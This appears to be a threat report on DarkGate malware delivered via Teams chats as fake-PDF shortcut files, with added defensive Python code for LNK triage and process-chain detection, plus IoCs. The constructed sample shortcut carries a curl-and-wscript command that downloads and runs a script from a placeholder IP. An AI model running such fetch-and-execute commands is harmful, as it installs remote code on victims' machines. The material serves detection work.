Summary
First publicly reported in 2017, DarkGate is Windows malware with a wide range of capabilities, including credential theft and remote access to victim endpoints. Until recently it was delivered only through conventional email malspam campaigns; the delivery methods have since changed.
Numerous researchers and threat hunters have observed phishing campaigns that use messaging and online-conferencing applications such as Skype and Microsoft Teams, exploiting the trust employees place in these channels compared with the well-known vector of email phishing.
The malware is disguised as a PDF with file names such as "Employees_Affected_by_Transition" and "Company_Transformations", chosen to catch victims' attention and encourage them to open the file.
In reality the files are malicious shortcut (LNK) files posing as PDF documents. When a victim clicks one, it runs a command that downloads and executes a malicious script from a remote IP address.
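As an added example (not tooling from the original page or its references), the following Python script parses the string data of a shortcut file and flags the traits of the lure described above: a document-style double extension, a LOLBin target, a download from a bare IP:port URL, a dropped .vbs and a minimised window. It assumes the MS-SHLLINK on-disk layout and forges a constructed sample with a TEST-NET address (192.0.2.10) and placeholder file names so that it runs offline; none of those values are IoCs from this report.

```python
"""Static triage of Windows shortcut (.lnk) files for the DarkGate lure pattern.

Added example, not code from the original page. The sample built by build_lnk() is
constructed: 192.0.2.10 is a TEST-NET address and the paths are placeholders.
"""
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# LinkFlags bits from MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of the victim's view

LOLBIN = re.compile(r'(?:^|[\\\s"])(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|curl|certutil|bitsadmin)(?:\.exe)?\b', re.I)
IP_PORT_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}:\d{2,5}/", re.I)
DOC_AS_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk$", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link (header checked, IDList and LinkInfo skipped)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize does not count its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    link = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    for field, bit in STRING_FIELDS:
        link[field] = ""
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            link[field] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            link[field] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return link


def triage_lnk(filename: str, data: bytes) -> list[str]:
    """Tag the traits of the lure; an empty list means nothing matched."""
    link = parse_lnk(data)
    cmdline = f'{link["relative_path"]} {link["arguments"]}'.strip()
    tags = []
    if DOC_AS_LNK.search(filename):
        tags.append("doc-double-extension")
    if LOLBIN.search(cmdline):
        tags.append("lolbin-target")
    if IP_PORT_URL.search(cmdline):
        tags.append("ip-port-url")
    if re.search(r"\.vbs\b", cmdline, re.I):
        tags.append("vbs-dropper")
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        tags.append("hidden-window")
    return tags


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Forge a minimal unicode shell link carrying only RelativePath and Arguments (constructed sample)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    header = (struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le
              + struct.pack("<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0))

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments) + struct.pack("<I", 0)  # TerminalBlock


# Constructed stand-in for the lure: cmd.exe fetches a VBS from a bare IP:port and runs it.
LURE_NAME = "Changes_to_the_vacation_schedule.pdf.lnk"
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r"/c curl -o C:\temp\x.vbs http://192.0.2.10:2351/abcd && wscript C:\temp\x.vbs",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "")

if __name__ == "__main__":
    print(parse_lnk(LURE_LNK)["arguments"])
    print(triage_lnk(LURE_NAME, LURE_LNK))
    print(triage_lnk("notes.lnk", BENIGN_LNK))
```

The parser deliberately stops after the StringData section; the ExtraData blocks that follow (machine ID, MAC address, droid volume IDs) are the metadata trail the Talos reference describes, and a full-featured tool such as LECmd should be used when that provenance matters.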
Underground Markets
This surge in activity can be attributed to the malware's developer, who, after using it privately for a significant period, began offering it to other threat actors as malware-as-a-service.
In the screenshot above, a rental service is announced for a private RAT called Dark-Gate. The threat actor claims that the RAT abuses a vulnerability in Microsoft Windows. The price is $15,000 per month or $100,000 for lifetime access.
Several other hacker forums have (or have had) this product for sale; versions of DarkGate have been advertised on the Russian-language forum eCrime since May 2023.
Technical Details
DarkGate boasts a range of features, including the ability to:
- Execute discovery commands, including directory traversal.
- Self-update and self-manage.
- Provide remote access through remote desktop protocol (RDP), hidden virtual network computing (hVNC), and AnyDesk.
- Run cryptocurrency-mining functionality (start, stop, and configure).
- Perform keylogging.
- Steal data from web browsers.
- Perform privilege escalation.
DarkGate uses AutoIt, a legitimate Windows automation and scripting tool, to deliver and execute its malicious operations. Although AutoIt itself is benign, it is frequently abused by malware families for defense evasion and as an added layer of obfuscation. Notably, it has not been observed in other well-known loaders such as IcedID, Emotet, or Qakbot, which makes AutoIt-based activity easier for researchers and security teams to associate with DarkGate campaigns.
Comparing this latest DarkGate variant with a sample that also abused AutoIt in 2018 shows only slight changes: a modified initial stager and obfuscation added to its command lines. The overall infection chain remains largely the same.
The initial entry point is a malicious LNK (shortcut) file disguised as a PDF document, named "Changes to the vacation schedule.pdf.lnk".
When the LNK file is executed, it downloads and runs an external VBScript file at "C:\temp\xxxxx.vbs". This VBScript is responsible for fetching and executing the next stages.
The VBScript contacts a remote server at "http://IP:2351/XXXXX" to download additional files, using a Windows build of cURL renamed to "wbza".
The downloaded files include the AutoIt interpreter and the bundled script XXXXX.au3, which hides the malicious code within its structure.
The AutoIt script checks whether Sophos antivirus is installed on the victim's system. If Sophos is not detected, it proceeds to the next stage.
The AutoIt script then executes shellcode, which uses the "stacked strings" technique to assemble a new file in memory. The file begins with the bytes 0x4D 0x5A ("MZ"), the signature of a Windows PE executable.
This newly created file is the DarkGate payload, which is loaded into memory at this point.
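The chain above (LNK, cmd.exe, wscript.exe, renamed cURL, AutoIt from a temp directory) maps directly onto process-creation telemetry. As an added example, not a detection from the original page or its references, the following Python script expresses each link of the chain as a rule over Sysmon-style Event ID 1 fields (ProcessId, ParentProcessId, Image, CommandLine, OriginalFileName) and runs them over a constructed event stream. The PIDs, paths and the TEST-NET address 192.0.2.10 are placeholders, not IoCs, and the benign AutoIt event at the end is there to show the rules do not fire on an interpreter installed under Program Files.

```python
"""Detection logic for the DarkGate delivery chain over process-creation events.

Added example, not code from the original page. EVENTS is a constructed stream that
mimics Sysmon Event ID 1 fields; 192.0.2.10 is a TEST-NET address, not an IoC.
"""
import re

IP_PORT_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}:\d{2,5}/", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"^(c:\\temp\\|c:\\programdata\\|c:\\users\\[^\\]+\\(appdata|downloads)\\)", re.I)
LNK_CHAIN = ["wscript.exe", "cmd.exe", "explorer.exe"]  # nearest ancestor first


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: dict, ev: dict) -> list[str]:
    """Image basenames of parent, grandparent, ... (stops at unknown PIDs and cycles)."""
    names, seen, pid = [], set(), ev["ParentProcessId"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return names


def is_subsequence(needle: list, hay: list) -> bool:
    it = iter(hay)
    return all(any(x == h for h in it) for x in needle)


def is_autoit(ev: dict) -> bool:
    # Also match the PE's OriginalFileName so renaming the interpreter does not evade the rule.
    return ev.get("OriginalFileName", "").lower() == "autoit3.exe" or basename(ev["Image"]).startswith("autoit3")


def rule_renamed_curl(ev: dict, by_pid: dict) -> bool:
    """curl.exe running under another on-disk name (the 'wbza' stage)."""
    return ev.get("OriginalFileName", "").lower() == "curl.exe" and basename(ev["Image"]) != "curl.exe"


def rule_script_host_downloads_from_ip(ev: dict, by_pid: dict) -> bool:
    """A VBS/JS script host spawning a child that fetches from a bare IP:port URL."""
    parent = by_pid.get(ev["ParentProcessId"])
    return (parent is not None and basename(parent["Image"]) in SCRIPT_HOSTS
            and IP_PORT_URL.search(ev["CommandLine"]) is not None)


def rule_autoit_from_writable_path(ev: dict, by_pid: dict) -> bool:
    """AutoIt interpreter executing a .au3 from a user-writable location."""
    return (is_autoit(ev) and USER_WRITABLE.match(ev["Image"]) is not None
            and re.search(r"\.au3\b", ev["CommandLine"], re.I) is not None)


def rule_lnk_to_autoit_chain(ev: dict, by_pid: dict) -> bool:
    """explorer -> cmd -> wscript ancestry ending in AutoIt: the LNK-launched chain as a whole."""
    return is_autoit(ev) and is_subsequence(LNK_CHAIN, ancestry(by_pid, ev))


RULES = [("renamed-curl", rule_renamed_curl),
         ("script-host-downloads-from-ip", rule_script_host_downloads_from_ip),
         ("autoit-from-writable-path", rule_autoit_from_writable_path),
         ("lnk-to-autoit-chain", rule_lnk_to_autoit_chain)]


def detect(events: list[dict]) -> list[tuple[int, str]]:
    """Return (ProcessId, rule name) for every rule that fires on every event."""
    by_pid = {e["ProcessId"]: e for e in events}
    return [(ev["ProcessId"], name) for ev in events for name, rule in RULES if rule(ev, by_pid)]


# Constructed event stream: one full infection chain plus a benign AutoIt run from Program Files.
EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 4, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\temp\xxxxx.vbs"'},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\temp\xxxxx.vbs"'},
    {"ProcessId": 400, "ParentProcessId": 300, "Image": r"C:\temp\wbza", "OriginalFileName": "curl.exe",
     "CommandLine": r"C:\temp\wbza -o C:\temp\Autoit3.exe http://192.0.2.10:2351/abcd"},
    {"ProcessId": 500, "ParentProcessId": 300, "Image": r"C:\temp\Autoit3.exe", "OriginalFileName": "AutoIt3.exe",
     "CommandLine": r"C:\temp\Autoit3.exe C:\temp\script.au3"},
    {"ProcessId": 600, "ParentProcessId": 100, "Image": r"C:\Program Files\AutoIt3\AutoIt3.exe",
     "OriginalFileName": "AutoIt3.exe",
     "CommandLine": r'"C:\Program Files\AutoIt3\AutoIt3.exe" C:\Users\bob\Documents\backup.au3'},
]

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

The chain rule keys on ancestry rather than on file hashes, so it survives the per-campaign changes to stager names and URLs that the hash-based IoCs below do not; the OriginalFileName checks come from the PE version resource, which Sysmon records and which a simple rename of curl.exe or AutoIt3.exe does not alter.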

Recommendations
- Restrict Microsoft Teams (and Skype) chat requests from external domains, for example by allow-listing only trusted partner domains.
- Keep EDR signatures and detections current with the latest indicators of compromise; where possible, add the IoCs listed below manually to ensure coverage.
- Monitor system activity and logs for unusual or suspicious behaviour, such as script hosts launching downloads or AutoIt executing from temporary directories.
- Back up important data regularly to guard against data loss.
- Train employees to treat attachments and links from external sources with caution, including those arriving through chat platforms.
Indicators of Compromise (IoCs)
SHA1
3dd98117802d1992066188402ff63411f5a38c51
a571b70c6303e9144ed8a169bb0322e80226bcc5
5953d721de1716fca88fa6472504dfde11ee3899
a8745ee6756e9288d88cc0a648c1ec06545f660e
d39a35fefa9afb0ca1cfa19bcacae54b254d02ce
48e3dc8b02426c433b4cc121b487110845a657cc
8ecaf752c5a9e57f496c951321415ca7ba470db6
b8b21937d161363be05d3e7c43b9f3dbe11f807d
e77b4b69ac5480f063c0cfc427536bac32cd7f88
88e3a57c8d8919aed0200c04b19e08660ca3262e
8ef6d55e6ef2427c79f9a6ed5a3ecd1421fc75a9
d50afee5b441e068439d74641a0a48311c0dfe8d
e5c54ea9c51edba2c89da11e8bcf2ebd3f7869b4
443e7cfb3956975708dd6b2ea74e9fe2f3d03bf8
MD5
fd758ef8e211fbd7eca6fa5d817a6c17
a5c037dadbb68777e54b5b10a7362ce1
f3ebac62f6f648bbb02775e5b53bd4ba
6222785ea87e7a8ed5a554fe9b14dad1
652a4dd6f0c5cc44aa934c6a83f9d796
c56b5f0201a3b3de53e561fe76912bfd
7fdd6ea882945269ca95e4ae677f2723
c58efaa542aa3c052a23fa7aec37a4ef
Malicious Files
Company_Transformations_October_2023.pdf
Employees_Affected_by_Transition_October_2023.pdf
Fresh_Mission_and_Core_Values_October_2023.pdf
Position_Guidelines_October_2023.pdf
Revamped_Organizational_Structure_October_2023.pdf
Malicious IPs
185.39.18[.]170
87.106.16[.]115
5.188.87[.]58
Malicious URL
http://5.188.87[.]58:2351/kzbrotjb
https://5.188.87[.]58:2351/msibtbgvbyy
References
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Trojan.Win32.DARKGATE.YXDJKZ/
https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams
https://www.forescout.com/resources/darkgate-loader-malspam-campaign/
https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/#msi-loader
https://github.com/EricZimmerman/LECmd
https://github.com/telekom-security/malware_analysis/blob/main/darkgate/yara-rule-builder.py
https://blog.talosintelligence.com/following-the-lnk-metadata-trail/